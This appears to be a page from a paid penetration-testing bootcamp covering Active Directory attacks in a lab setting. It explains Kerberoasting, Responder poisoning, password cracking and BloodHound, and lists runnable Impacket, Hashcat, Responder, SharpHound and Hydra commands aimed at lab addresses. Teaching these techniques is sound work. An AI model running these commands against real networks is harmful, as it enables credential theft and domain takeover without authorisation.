Metasploit modules, payloads, and the post-exploitation sequence — from initial access to privilege escalation to lateral movement in a legal lab environment.
Metasploit modules, payloads, and the post-exploitation sequence — from initial access to privilege escalation to lateral movement in a legal lab environment.
Active Directory (AD) is the backbone of Windows enterprise networks. Common attacks: AS-REP Roasting (Kerberos pre-auth disabled), Kerberoasting (cracking service ticket hashes), Pass-the-Hash (reusing NTLM credential hashes), and BloodHound (visualizing AD attack paths). Impacket is a Python library with tools for all of these.
Responder poisons LLMNR, NBT-NS, and MDNS requests on a LAN, causing Windows hosts to send you their NetNTLMv2 hashes automatically. Combined with Hashcat, you can crack weak passwords and use them for lateral movement. This attack works passively — just run Responder and wait for victims to misconfigure their name resolution.
Dictionary attacks use wordlists (rockyou.txt has 14M passwords). Rule-based attacks apply transformations (append numbers, capitalize first letter). Hashcat supports GPU acceleration — an RTX 3080 cracks 40+ billion MD5 hashes per second. Hydra and Medusa brute-force network services: SSH, RDP, SMB, FTP, web login forms.
# Kerberoasting with Impacket
GetUserSPNs.py -request -dc-ip 192.168.1.10 DOMAIN/user:password
# Crack Kerberos ticket with Hashcat
hashcat -m 13100 krb5tgs.hash /usr/share/wordlists/rockyou.txt
# Responder on LAN interface
responder -I eth0 -rdwv
# Crack captured NTLMv2 hashes
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt
# BloodHound data collection
SharpHound.exe -c All
# Then import .zip into BloodHound GUI
# Hydra SSH brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
ssh://192.168.1.100
Set up a two-machine AD lab (DC + workstation) and complete a full kill chain: Responder hash capture → Hashcat crack → SMB login → BloodHound enumeration → escalate to Domain Admin.
The foundations from today carry directly into Day 4. In the next session the focus shifts to Web Application Penetration Testing — building directly on everything covered here.
Before moving on, verify you can answer these without looking:
Live Bootcamp
Learn this in person — 2 days, 5 cities
Thu–Fri sessions in Denver, Los Angeles, New York, Chicago, and Dallas. $1,490 per seat. June–October 2026.
Reserve Your Seat →